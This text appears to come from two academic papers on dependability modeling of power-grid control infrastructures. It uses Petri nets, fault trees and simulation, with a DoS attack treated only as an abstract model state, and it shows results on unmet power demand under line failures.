The failure event of the CC is modeled by the transition CC_Fail: its firing time distribution is given by the FT. The firing of this transition leads to the marking of the place CC_Failed, modeling the state of failure. The marking of CC_Failed causes the inhibition of the transition CC_send. The attacker state is modeled by the places Idle and Active; the initial state is idle, but it can turn to active after the firing of the transition Begin_attack.
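To illustrate the firing mechanics (not the CRUTIAL model itself: we keep only a fragment of the request path, split the bandwidth acquisition into its own transition, and use invented rates), a race of enabled transitions with random firing times can be sketched as follows:

```python
import random

def fire_one(marking, transitions):
    """Fire the enabled transition that samples the earliest firing time."""
    enabled = [t for t in transitions
               if all(marking[p] >= k for p, k in t[2].items())]
    if not enabled:
        return None
    name, rate, pre, post = min(enabled,
                                key=lambda t: random.expovariate(t[1]))
    for p, k in pre.items():
        marking[p] -= k
    for p, k in post.items():
        marking[p] += k
    return name

marking = {"CC_buffer_out": 1, "CC_out": 0, "SS_buffer_in": 0, "Bandwidth": 3}
transitions = [
    # sending takes one unit of bandwidth ...
    ("CC_take_bw", 2.0, {"CC_buffer_out": 1, "Bandwidth": 1}, {"CC_out": 1}),
    # ... which is released when the transmission completes
    ("CC_transmit", 1.0, {"CC_out": 1}, {"SS_buffer_in": 1, "Bandwidth": 1}),
]
while (fired := fire_one(marking, transitions)):
    print(fired, marking)
```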
Fig. 4. SWN model representing the exchange of requests and replies between the CC and the SS by means of the communication network

Fig. 5. FT model representing the failure mode of the CC
In the active state, the attacker generates packets (transition AT_send) to be transmitted on the communication network (transition AT_transmit). As in the case of the transmission of requests and replies, the transmission of the attacker packets determines the reduction of the marking of the place Bandwidth. The complete unavailability of the bandwidth (the success of the DoS attack) is modeled by the place DoS becoming marked when no tokens are present in the place Bandwidth. The state of the attacker can turn back to idle if the transition End_attack fires, representing the discovery of the attack by some countermeasure.

The loss of replies is modeled by the timed transition Delay: if a token (pending request) stays inside the place Commands for a long time (the corresponding reply has not been received during that time), the transition Delay may fire, leading to the marking of the place Packet_loss, modeling the loss of a reply. Moreover, the transition RT removes a token from the place Packet_loss. Finally, the transitions perceptible_attack, signaled_failure, recovery and recovery1, and the places afterPA and afterSF, are used for mapping this model onto the abstract model (Sect. 2), as we will describe in detail in the next section.

FT model description. Fig. 5 shows the FT model representing the failure mode of the CC. This failure is represented by the top event, called CONTROL_CENTRE, which is the output of an OR gate whose inputs are the events TELECONTROL and NETWORK; therefore, the top event (the CC failure) occurs if the telecontrol function or the CC network fails. The event TELECONTROL represents the failure of the telecontrol devices; it is the output of an OR gate having ATS and ATS_WEB_SERVER as input events. Therefore the event TELECONTROL is caused by the failure of the ATS or by the failure of the ATS WEB SERVER. Finally, NETWORK fails if the ROUTER, the FIREWALL or the LAN fails.
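Since every gate in this tree is an OR, the top event occurs at the earliest basic-event failure time; a minimal sampling sketch (our illustration, with invented failure rates) of the kind of distribution that could drive the firing time of CC_Fail:

```python
import random

RATES_PER_HOUR = {            # illustrative basic-event failure rates
    "ATS": 1e-4, "ATS_WEB_SERVER": 1e-4,           # inputs of TELECONTROL
    "ROUTER": 5e-5, "FIREWALL": 5e-5, "LAN": 2e-5  # inputs of NETWORK
}

def sample_cc_failure_time():
    """Sample the time at which the top event CONTROL_CENTRE occurs."""
    basic = {e: random.expovariate(r) for e, r in RATES_PER_HOUR.items()}
    telecontrol = min(basic["ATS"], basic["ATS_WEB_SERVER"])        # OR gate
    network = min(basic["ROUTER"], basic["FIREWALL"], basic["LAN"]) # OR gate
    return min(telecontrol, network)                            # top OR gate

print(f"sampled CC failure time: {sample_cc_failure_time():.0f} h")
```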
3.3 Interpretation of the Model Measures w.r.t. the Abstract Model
The abstract model introduced in Sect. 2 allows capturing the interesting interdependency phenomena at a high abstraction level. The example introduced in Sect. 3.2 can be mapped onto the abstract model as follows:

1. The signaled i-failure in the CC is triggered by the firing of the transition CC_Fail, whose firing time is controlled by the FT model.
2. The perceptible attack corresponds to a loss of responsiveness due to a DoS attack and is modeled by a transition whose firing is activated when n commands are lost in a short period.

Observe that in the model command messages (and the corresponding acknowledgments) are never actually lost; however, if the acknowledgment of a transmitted command arrives later than a specified maximum amount of time, this is interpreted as a command loss. This mechanism is implemented by introducing a Delay transition, activated when a command has been sent from the CC, and working as a timeout used to record an excessive delay of the command acknowledgment. When Delay fires, another timeout starts to count, which is used to forget about command/acknowledgment losses after a certain time since their occurrence. If the model manages to accumulate enough (n) command
losses before they expire, this is interpreted as an indication that some misbehavior is happening which should be signaled.

The connection between the detailed and abstract models can be established in different ways. The first option is to define a correspondence among states: for example, we could say that all states with at least one token in place afterPA or in place afterSF correspond to state 4, while all states where these two places are not marked correspond to state 1. Computing the distribution of the time required to reach abstract state 4 from abstract state 1 can then be performed on the detailed model by simply making the states with m(afterPA) + m(afterSF) > 0 absorbing and computing on the model the distribution of the time to absorption. If we also consider the possibility of restoration (which for the moment is represented in the detailed model as two simple "reset" transitions, called recovery and recovery1, which bring the whole net back to the initial state), then we can also compute steady-state behavior measures, e.g., the probability of being in state 1 or 4.

The alternative way to couple the two models is by making a correspondence between the transitions: in this example this is particularly simple because the transitions "signaled failure" and "perceptible attack" (as well as "recovery" and "recovery1") can be directly put in correspondence with the homonymous transitions in the abstract model. In this case the mapping among the states is indirect (but can be made explicit by adding some "implicit places" in the detailed model representing the abstract model states and connecting them to the matching transitions).

Finally, in order to compute performance measures it is necessary to associate a firing delay probability distribution with every timed transition in the detailed model. These firing delay probability distributions can be deduced from experimental data obtained both by observation of real system behavior and by testbed simulation. If all these distributions can be expressed as negative exponential distributions, then the system performance measures can be computed by numerical analysis; otherwise, by simulation.
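For instance, under the (purely illustrative) assumption that the two competing paths to state 4 have exponentially distributed delays, the time-to-absorption distribution can be estimated by simulation along the lines of:

```python
import random

RATE_SIGNALED_FAILURE = 1e-3    # assumed rate of reaching state 4 via failure
RATE_PERCEPTIBLE_ATTACK = 5e-4  # assumed rate of reaching state 4 via attack

def time_to_state4():
    # the earlier of the two competing transitions determines absorption
    return min(random.expovariate(RATE_SIGNALED_FAILURE),
               random.expovariate(RATE_PERCEPTIBLE_ATTACK))

samples = sorted(time_to_state4() for _ in range(10_000))
print("median time to reach state 4:", round(samples[len(samples) // 2], 1))
```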
4 Conclusion and Perspective
This paper presented a dependability modeling approach that takes into account interdependency-related failures affecting electrical infrastructures and the associated information infrastructures supporting, e.g., management, control and monitoring activities. Two abstraction levels are considered. At the highest level, each infrastructure is modeled globally as a black box, and the proposed models identify cascading and escalating failure scenarios and the corresponding service restoration actions resulting from accidental failures or malicious attacks.

The failure scenarios highlighted at this abstraction level result from the occurrence and propagation of elementary events originating from the subsystems and components of the infrastructures. The development of detailed models taking into account the structure and the internal behaviour of the infrastructures is useful to link the elementary failure events to the high-level scenarios of cascading and escalating failures. Also,
the detailed models can contribute to the definition of the probability distributions to be associated with the transitions in the high-level abstract model, in order to evaluate quantitative measures characterizing the impact of interdependencies with regard to the occurrence of blackouts. One of the critical issues that needs to be addressed in this context is the mapping of the detailed models to the high-level abstract models. The example presented in this paper, inspired by a case study investigated in CRUTIAL, is aimed at illustrating how this mapping can be achieved and how the effects of accidental and malicious failures can be analyzed together.

So far we have considered simple scenarios. More complex detailed models are currently being investigated, taking into account the main subsystems and components of both the electrical and the information infrastructures. Two other possible directions of future work are: (1) the compositional construction of the higher abstraction level models from submodels of the two infrastructures, highlighting the cause-effect relations between events: this can be done either using automata or using Petri Nets (the latter choice would also ease the subsequent composition with lower-level PN models); (2) adding a further level of detail (typically corresponding to accurate simulation models) from which the quantitative parameters of the intermediate-level models can be deduced when direct measures from real systems are not available.

Acknowledgment. This work is partially funded by the European Commission through the CRUTIAL project. All our thanks to Jean-Claude Laprie who developed the main concepts behind the abstract model of interdependencies used in this paper.
References

1. Chiola, G., Dutheillet, C., Franceschinis, G., Haddad, S.: Stochastic well-formed coloured nets for symmetric modelling applications. IEEE Transactions on Computers 42(11), 1343–1360 (1993)
2. Garrone, F., et al.: Analysis of new control applications. CRUTIAL Deliverable D2 (2007), http://crutial.cesiricerca.it/Dissemination
3. Kaâniche, M., et al.: Methodologies Synthesis. CRUTIAL Deliverable D3 (2007), http://crutial.cesiricerca.it/Dissemination
4. Kaâniche, M., et al.: Preliminary modelling framework. CRUTIAL Deliverable D8 (2008), http://crutial.cesiricerca.it/Dissemination
5. Laprie, J.-C., Kanoun, K., Kaâniche, M.: Modelling interdependencies between the electricity and information infrastructures. In: Saglietti, F., Oster, N. (eds.) SAFECOMP 2007. LNCS, vol. 4680, pp. 54–67. Springer, Heidelberg (2007)
6. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine 21(6), 11–25 (2001)
7. Schneeweiss, W.G.: The Fault Tree Method. LiLoLe Verlag (1999)
Interdependency Analysis in Electric Power Systems

Silvano Chiaradonna¹, Felicita Di Giandomenico¹, and Paolo Lollini²

¹ Italian National Research Council, ISTI Dept., via Moruzzi 1, I-56124, Pisa, Italy
{chiaradonna,digiandomenico}@isti.cnr.it
² Università degli Studi di Firenze, Dip. Sistemi e Informatica, viale Morgagni 65, I-50134, Firenze, Italy
[email protected]

Abstract. Electric Power Systems (EPS) are composed of two interdependent infrastructures: the Electric Infrastructure (EI) and its Information-Technology based Control System (ITCS), which controls and manages the EI. In this paper we address interdependency analysis in EPS, focusing on the cyber interdependencies between ITCS and EI and aiming to evaluate their impact on blackout-related indicators. The obtained results contribute to a better understanding of EPS vulnerabilities, and are expected to provide useful guidelines towards enhanced design choices for EPS protection at the architectural level.
1 Introduction

Nowadays, public health, economy, security and quality of life heavily depend on the resiliency of a number of critical infrastructures, including energy, telecommunications, transportation, emergency services and many others. Technological advances and the necessity for improved efficiency have resulted in increasingly automated and interlinked infrastructures, with the consequence of increased vulnerability to accidental and human-made faults. Modeling the interdependencies among such interlinked infrastructures and assessing the impact of interdependencies on the ability of the system to provide resilient and secure services are of primary importance. Following this analysis, steps can be taken to mitigate the identified vulnerabilities. Critical infrastructure protection is therefore a priority for most countries, and several initiatives are in place to identify open issues and research viable solutions in this highly challenging area, especially to identify vulnerabilities and devise survivability enhancements in critical areas. An overview of relevant current initiatives in this field is provided in [1].

Among such initiatives, the European project CRUTIAL [5] addresses new networked systems based on Information and Communication Technology for the management of the electric power grid, in which artefacts controlling the physical process of electricity transportation need to be connected with information infrastructures, through corporate networks (intranets), which are in turn connected to the Internet. A major research line of the project focuses on the development of a model-based methodology for the dependability and security analysis of the power grid information infrastructures. One of the approaches pursued in CRUTIAL is a model-based quantitative support for the analysis and evaluation of critical scenarios in EPS. An overview of the developed quantitative modeling framework is given in [3,1]. It is based on generic models capturing structural
and behavioral aspects of the two involved infrastructures: the electric infrastructure, EI, and the information-technology based control system, ITCS. The novelty with respect to traditional analyses of EPS is that the framework explicitly takes into account the various forms of interactions which are the vehicles through which failures propagate, possibly ending up in cascading, escalating and common-mode outages. As a follow-up of these previous studies, the contribution of this paper consists in the application of the developed modeling framework to a case study in the electric power system under different system conditions. The goal is to show the practical usage of the framework in assessing quantitative values for user-oriented measures in the electric field, and to highlight some of the potentialities of the framework in analyzing the various aspects involved in the complex relationships between EI and ITCS in EPS. The obtained results are useful for gaining insights and understanding the interplay of failure phenomena and critical system functions (like the repair of failed components/subsystems), so as to derive useful guidelines towards configurations enhancing resiliency and survivability.

The paper is organized as follows. Section 2 introduces the logical structure of the electric power system instance we have considered in our study. Section 3 focuses on the failures of the information control infrastructure and their consequences on the controlled electric infrastructure. The overall model of the considered EPS instance is sketched in Section 4. The analyzed case study, in terms of electric grid topology, the varying system conditions as well as the measures of interest, is introduced in Section 5. The results of the numerical evaluation are discussed in Section 6. Finally, conclusions are summarized in Section 7.
2 The Analyzed EPS Instance

The logical structure of the analyzed EPS instance is depicted in Figure 1. For the sake of simplicity, the proposed EPS instance is limited to a homogeneous region of the transmission grid and to the corresponding regional control system. In the bottom part of Figure 1 we can see the main elements that constitute the overall electric infrastructure, and thus in particular a region of the transmission power grid: generators (NG components), substations (NS components), loads (NL components) and power lines (AL components, which also logically include the breakers and protections connected to the power lines). The energy produced by the generators is adapted by transformers to be conveyed, with minimal dispersion, to the different types of end users (loads), through different power grids. The power lines are components that physically connect the substations with the power plants and the final users, and the substations are structured components in which the electric power is transformed and split over several lines. In the substations there are transformers and several kinds of connection components (like bus-bars, protections and breakers).

The Information-Technology based Control System (ITCS) implements the information control system managing the electrical grid. Among the several logical components composing ITCS (all detailed in [3]), here we focus the attention on the tele-operation system for a region of the transmission grid (named TTOS), since its failure can affect a large portion of the grid, possibly also leading to blackout phenomena. In the upper part of
Fig. 1. Logical structure of the analyzed EPS instance
Figure 1 we have depicted a possible logical structure of a regional ITCS, i.e., the part of the information control system controlling and operating on a region of the transmission grid. The components LCS (Local Control System) and RTS (Regional Tele-control System) differ in their criticality and in the locality of their decisions, and they can exchange grid status information and control data over a (public or private) network (ComNet component). LCS guarantees the correct operation of a node's equipment and reconfigures the node in case of breakdown of some apparatus. It includes the acquisition and control equipment (sensors and actuators). RTS monitors its assigned region in order to diagnose faults on the power lines. In case of breakdowns, it chooses the most suitable corrective actions to restore the functionality of the grid. Since RTS is not directly connected to the substations, the corrective actions to adopt are put into operation through the pertinent LCS.

2.1 RTS/LCS Reconfiguration Strategies and EI Autoevolution

The main operations performed by ITCS on EI are to control its correct functioning and to activate proper reconfigurations in case of failure of EI components, or integration of repaired/new EI components. Such operations are not considered in detail but are abstracted at two levels, on the basis of the locality of the EI state considered by ITCS to decide on proper reactions to disruptions (the same approach adopted in [4]). Each level is characterized by an activation condition (that specifies the events that enable the ITCS reaction), a reaction delay (representing the overall computation and application time needed by ITCS to apply a reconfiguration) and a reconfiguration strategy (RS), based on generation re-dispatch and/or load shedding. The reconfiguration strategy RS defines how the configuration of EI changes when ITCS reacts to a failure. For each level, a different reconfiguration function is considered:
– RS1(), representing the effect on the regional transmission grid of the reactions of ITCS to an event that has compromised the electrical equilibrium¹ of EI, when only the state local to the affected EI components is considered. Given the limited information necessary to issue its output, RS1() is deemed to be local and fast in providing its reaction. RS1() is performed by the LCS components when they locally detect that there is no (electrical) equilibrium.
– RS2(), representing the effect on the regional transmission grid of the reactions of ITCS to an event that has compromised the electrical equilibrium of EI, when the state global to the whole EI system under the control of ITCS is considered. Therefore, differently from RS1(), RS2() is deemed to be global and slower in providing its reaction. When new events changing the status of EI occur during the evaluation of RS2(), the evaluation of RS2() is restarted on the basis of the new topology generated by such events. RS2() is performed by RTS.

The activation condition, the reaction delay and the definition of the functions RS1() and RS2() depend on the policies and algorithms adopted by TTOS. An autoevolution function AS() is also considered, representing the automatic evolution of EI each time an event modifying the grid topology occurs. In this case, EI tries to find a new electrical equilibrium for the new grid topology by changing the values of the power flow through the lines while leaving the generated and consumed power unchanged (only a redirection of current flows). The new equilibrium, if any, is reached instantaneously and no ITCS actions are performed. Otherwise, the LCS and RTS operations, i.e. RS1() and RS2() respectively, are triggered.

2.2 About RS1(), RS2() and AS() Implementation

Some simplifying assumptions have been made to represent the power flow through the transmission grid, following the same approach used in [4,5,6,7]. The state and the evolution of the transmission grid are therefore described by the active power flow F on the lines and the active power P at the nodes (generators, loads or substations), which satisfy linear equations for a direct current (DC) load flow approximation of the AC system. In the considered instance, the output values of AS() for the active power flow F on the power lines are derived by solving a linear power flow equation system for fixed values of P. The output values of RS1() and RS2() for P and F are derived considering that, for a given power demand, the power flow equations do not have a unique solution. The adopted definition of the function RS1() is given by the solution (values for P and F) of the power flow equations that minimizes a simple cost function, indicating the cost incurred in having loads not satisfied and in having the generators produce more power. The output values of RS2() for P and F are derived by solving an optimization problem that minimizes the change in generation or load shedding, considering more sophisticated system constraints, as described in [4]. The reconfiguration strategy RS1() is applied immediately, while RS2() is applied after the time needed by RTS to evaluate it. All these functions are based on the state of EI at the time immediately before the occurrence of the failure.

¹ Events that affect the electrical equilibrium are typically the failure of an EI component or the insertion of a new/repaired EI component; for simplicity, in the following we mainly refer to failures.
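To make the DC load flow approximation concrete, the following sketch (ours, not the CRUTIAL implementation; the function name, data layout and slack-bus convention are assumptions) mimics the AS() step: for fixed injections P it recomputes the flows by solving B·θ = P, where B is the susceptance-weighted Laplacian of the grid, and sets F_ij = b_ij(θ_i - θ_j).

import numpy as np

def dc_load_flow(lines, P, slack=0):
    # lines: list of (i, j, b_ij) tuples; P: nodal active power injections.
    # Mimics AS(): only the flows are redirected, P is left unchanged.
    n = len(P)
    B = np.zeros((n, n))
    for i, j, b in lines:
        B[i, i] += b
        B[j, j] += b
        B[i, j] -= b
        B[j, i] -= b
    keep = [k for k in range(n) if k != slack]  # fix the slack angle to 0
    theta = np.zeros(n)
    # The reduced system is nonsingular as long as the grid stays connected.
    theta[keep] = np.linalg.solve(B[np.ix_(keep, keep)], np.asarray(P, float)[keep])
    return {(i, j): b * (theta[i] - theta[j]) for i, j, b in lines}

A line whose resulting flow exceeds its maximum capacity would then trigger the RS1()/RS2() reactions described above.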
3 Cyber Interdependencies

An interdependency is a bidirectional relationship between two infrastructures through which the state of each infrastructure influences or is correlated to the state of the other. Among the several types of interdependencies identified in [8], our interest is in cyber interdependencies, which in general occur when the state of an infrastructure depends on information transmitted through the information infrastructure it is related with. In our context, EI requires information transmitted and delivered by ITCS, for example when RTS triggers a grid reconfiguration (RS2()); therefore the state of EI depends on the outputs of ITCS. Cyber interdependencies are especially critical considering the possible ITCS failures that may impact the state of EI, depending on the logical components affected by the failures and, obviously, on the type of the failures. For example, the consequences of a failure of the LCS component associated with an EI component NG, NS or NL can be:
– Omission failure of LCS (fail-silent LCS). No (reconfiguration) actions are performed on the associated EI component.
– Time failure of LCS. The (reconfiguration) actions are performed after a certain delay (or before the instant of time at which they are required).
– Value failure of LCS. An incorrect closing (or opening) of the power lines directly connected to the associated component is performed, or an incorrect variation of the power produced by the associated generator.

Failures of the LCS components can also impact the input values that the RTS component receives from LCS. These values can be omitted, delayed (or anticipated) or erroneous. Since the reconfigurations required by RTS are actuated by the associated LCS components, a failure of an LCS component can also impact the reconfigurations required by RTS. The failure of the RTS component corresponds to an erroneous (request of) reconfiguration of the state of EI (including an unneeded reconfiguration) affecting one or more components of the controlled region. The effect of a failure of RTS on a component N is the same as a failure of the LCS component associated with N. In the case of Byzantine failure these effects can be different for each component N. In general, the failures of the LCS and RTS components may depend on failures of the network connecting them.
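The three LCS failure modes listed above can be read operationally as distortions of the reconfiguration commands travelling from an LCS to its EI component. The fragment below is purely illustrative; the command encoding and all names are our assumptions, not part of the referenced framework.

from enum import Enum, auto

class LCSFailure(Enum):
    OMISSION = auto()  # fail-silent: no action reaches the EI component
    TIME = auto()      # action applied with a delay (or anticipated)
    VALUE = auto()     # incorrect action, e.g. the wrong line is opened

def deliver(command, mode=None, delay=0.0, wrong_action=None):
    # command is a (time, action) pair; returns what actually reaches EI.
    t, action = command
    if mode is LCSFailure.OMISSION:
        return None
    if mode is LCSFailure.TIME:
        return (t + delay, action)  # a negative delay models anticipation
    if mode is LCSFailure.VALUE:
        return (t, wrong_action)
    return command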
4 The Overall SAN Model for the Analyzed EPS Instance

The body of the modeling framework has already been introduced in [3], where the authors also discussed the feasibility of the proposed framework using Möbius [9], a powerful multi-formalism/multi-solution tool, and presented the implementation of a few basic modeling mechanisms adopting the Stochastic Activity Network (SAN) formalism [10], which is a generalization of the Stochastic Petri Net formalism.
In this section we show the composed SAN model representing the overall considered EPS instance. The following atomic models have been identified as building blocks to generate the overall EPS model:
– PL_SAN, which represents the generic power line with the connected transformers.
– PR1_SAN and PR2_SAN, which represent the generic protections and the breakers connected to the two extremities of the power line.
– N_SAN and LCS_SAN, which represent, respectively, a node of the grid (a generator, a load or a substation) and the associated Local Control System (see Figure 1).
– AUTOEV_SAN and RS_SAN, which represent, respectively, the automatic evolution (autoevolution) of EI when an event modifying its state occurs, and the local reconfiguration strategy applied by LCS (function RS1()).
– RTS_SAN and COMNET_SAN, which represent, respectively, the Regional Tele-control System RTS, where the regional reconfiguration strategy RS2() is modeled, and the public or private networks (ComNet of Figure 1).

Figure 2 shows how the atomic models are composed and replicated to obtain the composed model representing the EPS region.
Fig. 2. Composed model for an EPS region
The model AL represents a power line with the associated protections, and it corresponds to the AL logical component of Figure 1. This model is replicated to obtain all the necessary non-anonymous AL components of the grid. The model N_LCS is obtained by composing the atomic models N_SAN and LCS_SAN; the model is then replicated to obtain all the necessary non-anonymous NG, NS and NL components of the grid, with the associated LCS. The model Auto_Control is obtained by composing the atomic models AUTOEV_SAN and RS_SAN, so it represents both the autoevolution function and the reconfiguration strategy locally applied by the LCS components. The overall EPSREG model is finally obtained through composition of the different models, and it represents the EPS instance under study. The different atomic models interact with each other by sharing some places (common and extended) that represent the parameters or part of the state of the EPS, such as the topology of the grid, the susceptance of each line, the initial and current power of each node of the grid, the initial and current power flow through each line of the grid,
the status of the propagation of a failure or a lightning strike, the disrupted/failed components, the open lines, etc. These models populate our modeling framework as template models, which are used to represent a large variety of specific scenarios in the EPS sector. In principle, all the possible EPS configurations involving (a subset of) the addressed components are representable through a proper combination of the proposed models, except for aspects that have not yet been captured. Exercising the developed framework on several different scenarios will be useful to reveal aspects not yet included and then to proceed with a refinement.
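The template structure described above can be pictured as a composition tree. The snippet below is only a structural transcription under our naming assumptions; the actual models are Möbius compositions of SANs, not Python objects.

from dataclasses import dataclass, field
from typing import List

@dataclass
class Model:
    name: str
    parts: List["Model"] = field(default_factory=list)  # empty for an atomic SAN
    replicated: bool = False  # replicated to obtain non-anonymous instances

AL = Model("AL", [Model("PL_SAN"), Model("PR1_SAN"), Model("PR2_SAN")], replicated=True)
N_LCS = Model("N_LCS", [Model("N_SAN"), Model("LCS_SAN")], replicated=True)
AUTO = Model("Auto_Control", [Model("AUTOEV_SAN"), Model("RS_SAN")])
EPSREG = Model("EPSREG", [AL, N_LCS, AUTO, Model("RTS_SAN"), Model("COMNET_SAN")])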
5 Analyzed Power Grid, Measures of Interest and Failure Scenarios

The analyzed electric power grid is depicted in Figure 3. The grid is a portion of the IEEE 118 Bus Test Case², typically used in other studies related to EPS. The label associated with a generator represents the initial (active) power and the maximum power that the generator can supply ("P_i/P_i^max"). The label associated with a load represents the power demand of the load ("P_i"). The label associated with a line represents the initial power flow through the line and its susceptance³ ("F_ij (b_ij)"). We suppose that each line can carry the same maximum power flow (F_ij^max = 620 MW for each i, j). In the initial grid setting all the ratios P_i/P_i^max are equal to a fixed value α = 0.85, called the power grid stress level. By varying α, other EI settings are automatically determined. The measure of interest we consider is PUD(t, t+1), defined as the percentage of the mean power demand that is not met in the interval [t, t+1] (the symbol 'UD' stands for 'Unsatisfied Demand'). It is a user-oriented measure of the blackout size and can be obtained as the load shed (i.e., the power not served due to load shedding) divided by the power demand. In this paper we aim to assess the impact of cyber interdependencies on this black-out related indicator. Among the possible interdependencies (ITCS failures affecting EI) detailed in Section 3, in this paper we evaluate the impact on PUD(t, t+1) of an omission failure of the communication network (ComNet of Figure 1) occurring when a simultaneous failure of a set of transmission lines has occurred. This scenario is inspired by those considered in the project CRUTIAL. In more detail, the EI state is initially set as depicted in Figure 3, and it is in electrical equilibrium. At time zero we suppose that nLF power lines are simultaneously affected by a permanent disruption (e.g., due to a tree fall or a terrorist attack), thus becoming unavailable. The power lines that fail are randomly (uniformly) selected from the set of all available power lines. The repair time of the failed power lines is fixed at 24 hours. At the same time zero, the communication network ComNet connecting the LCS components to RTS is simultaneously affected by a denial of service (DoS) attack, thus impeding the LCS-RTS communication. Therefore, during a DoS attack, the reconfiguration strategy RS1() can be applied at any time, while the reconfiguration strategy RS2() cannot be applied.
² http://www.ee.washington.edu/research/pstca/pf118/pg_tca118bus.htm
³ The susceptance is used to determine the values of the power flow through the lines.
Fig. 3. Diagram of the EI grid (generators are circles, loads are squares and substations are rhombi). For the sake of clarity, only the integer part of the original values associated with generators, power lines and loads is shown (in MegaWatt).
The DoS attack ends after an exponentially distributed time with mean MTTRCNET, and from that time RTS can start computing the RS2() reconfiguration action, which will be applied after 10 minutes. The considered distributions and values for the failure, repair and reconfiguration processes do not refer to any specific real case; they are hypothetical but plausible, and are used just to show the potential of our analysis method (a minimal sketch of this scenario generation follows the list below). However, to account to some extent for variations of the assumed settings, we performed a sensitivity analysis on the following parameters:
– MTTRCNET, thus varying the duration of the DoS attack affecting the communication network. If MTTRCNET → ∞, then we are modeling an RTS omission failure.
– nLF, thus varying the severity of the overall EI failure.
– α, thus varying the initial stress level of the power grid.
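A minimal sketch of the scenario generation just described (the helper and its names are hypothetical; only the distributions and constants come from the text):

import random

def sample_scenario(all_lines, n_lf, mttr_cnet_h, rng=None):
    rng = rng or random.Random()
    failed = rng.sample(all_lines, n_lf)            # uniform choice of failed lines
    line_repair_h = 24.0                            # fixed repair time of the lines
    dos_end_h = rng.expovariate(1.0 / mttr_cnet_h)  # end of the DoS attack
    rs2_applied_h = dos_end_h + 10.0 / 60.0         # RS2() applied 10 minutes later
    return failed, line_repair_h, rs2_applied_h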
6 Numerical Evaluations and Analysis of the Results

In this section we present some of the results obtained through the solution of the overall model previously sketched. A transient analysis has been performed, using the simulator provided by the Möbius tool [9]. For each study we executed a minimum of 2000 simulation runs (batches), and we set the relative confidence interval to 0.1 and the confidence level to 0.95. This means that the stopping criterion is not satisfied until the confidence interval is within 10% of the mean estimate in 95% of the cases.
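The stopping rule can be paraphrased as follows; this is a sketch based on batch means under our assumptions, not the Möbius implementation.

import math
import statistics

def run_until_confident(run_batch, min_batches=2000, rel_width=0.1, z=1.96):
    samples = []
    while True:
        samples.append(run_batch())  # one simulation batch -> one estimate
        n = len(samples)
        if n < min_batches:
            continue
        mean = statistics.fmean(samples)
        half_width = z * statistics.stdev(samples) / math.sqrt(n)
        # Stop once the confidence half-width is within 10% of the mean
        # estimate (a run with all-zero samples stops immediately).
        if half_width <= rel_width * abs(mean):
            return mean, half_width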
Fig. 4. Percentage of the mean power demand that is not met in the interval [t, t+1], with t = 0, 1, ..., 96 hours, for different values of MTTRCNET (6, 24 hours), nLF (1, 2) and α (0.85, 0.95)

Fig. 5. Percentage of the mean power demand that is not met in the interval [t, t+1], with t = 0, 1, ..., 96 hours and α = 0.95, for different values of MTTRCNET (6, 24 hours) and nLF (1, 2, 3, 4, 5)
In Figure 4 we show the variations of PUD(t, t+1) as a function of the time t (hours) for different durations of the DoS attack (exponentially distributed with mean MTTRCNET = 6 or 24 hours), for a different number of simultaneous power line disruptions (nLF = 1 or 2) and for different initial stress levels (α = 0.85 or 0.95). We note that the failure of even a single random power line at time zero produces an immediate increment of PUD(t, t+1) greater than 2%. For α = 0.95, the values of PUD(t, t+1) increase rapidly over time until the reconfiguration strategy RS2() is applied (i.e., 10 min. after the DoS attack ends).
Fig. 6. Probability that PUD(t, t+1) is in the interval (a, a+10]%, with a = 0, 10, 20, ..., 90, fixing α = 0.95, nLF = 1 and MTTRCNET = 24 hours
This is the effect of the cascading failures of the overloaded lines and of the excessively large variation of the power demanded from the generators within a small interval of time. In fact, with a high value of the power grid stress (α = 0.95), the autoevolution function AS() or the reconfiguration strategy RS1() triggered by the failure of even a single power line can overload lines or stress generators. On the contrary, with the lower stress level α = 0.85, the failure of only one power line leads EI to a stable state that does not need an RTS reconfiguration (no shedding operations are needed), and PUD(t, t+1) remains constant in the interval [0, 24]. At t = 24 hours there is a large improvement due to the repair of the failed power lines; the nominal conditions of the system are then restored, with the consequent full satisfaction of the power demand after some time. It is worthwhile to note that the impact of the system stress level α on the percentage of unsatisfied demand is less heavy than that of the failure of power lines: e.g., the curve with α = 0.95 and nLF = 1 is better than the one with α = 0.85 and nLF = 2. Figure 5 shows how PUD(t, t+1) varies as a function of the time t (hours) for different durations of the DoS attack (MTTRCNET = 6 or 24 hours) and for a different number of simultaneous power line disruptions (nLF = 1, 2, 3, 4 or 5), fixing α = 0.95. As expected, PUD(t, t+1) increases for higher nLF values and, for a fixed value of nLF, PUD(t, t+1) gets worse when the DoS attack has a longer duration (24 hours). In fact, if MTTRCNET = 6 hours, RTS can apply the RS2() reconfiguration action earlier (on average, after 6 hours and 10 min.), and then EI moves into a state less degraded than the state in which EI would be without the RTS reconfiguration. After 24 hours the disrupted power lines are repaired, and consequently PUD(t, t+1) rapidly decreases until reaching zero, since the original EI grid configuration (with all the loads satisfied) has been restored. The usefulness of applying the RTS reconfiguration can be fully appreciated by comparing all the plots with the first one, which represents the case in which no RTS reconfiguration is performed (RTS omission failure).
In both Figures 4 and 5 we have provided mean values of the percentage of unsatisfied power demand in an interval [t, t+1] for different values of t. In Figure 6 we show the discrete probability distribution function (PDF) of PUD(t, t+1) for the values t = 0, 5, 6, 23, 24 hours, fixing α = 0.95, nLF = 1 and MTTRCNET = 24 hours. Analyzing the corresponding plot in Figure 4 we see that the mean value of the percentage of undelivered power in the interval [0, 1] (the first hour) is PUD(0, 1) ≈ 2.5%. Analyzing its complete distribution in Figure 6, for t = 0, we note that: i) with a very high probability (0.9) the percentage of undelivered power is equal to zero; ii) PUD(0, 1) is in the interval (0, 10]% with a probability of about 0.03, and in the interval (40, 50]% with a probability of about 0.06; iii) all the other probabilities are almost zero. A mean loss of 40-50% of the delivered power in the first hour can happen, for example, when the power line affected by the failure is directly connected to a generator. The other plots, with t = 5, 6, 23, 24 hours, have similar trends.
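The binning behind Figure 6 can be reproduced from the per-batch values of PUD(t, t+1); the helper below is illustrative, not the tool's output format.

import math
from collections import Counter

def pud_pdf(batch_values, width=10.0):
    counts = Counter()
    for v in batch_values:
        if v <= 0:
            counts["0"] += 1  # separate probability mass at zero
        else:
            a = width * (math.ceil(v / width) - 1)  # left edge of (a, a+width]
            counts[f"({a:g},{a + width:g}]"] += 1
    total = len(batch_values)
    return {interval: c / total for interval, c in counts.items()}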
7 Conclusions

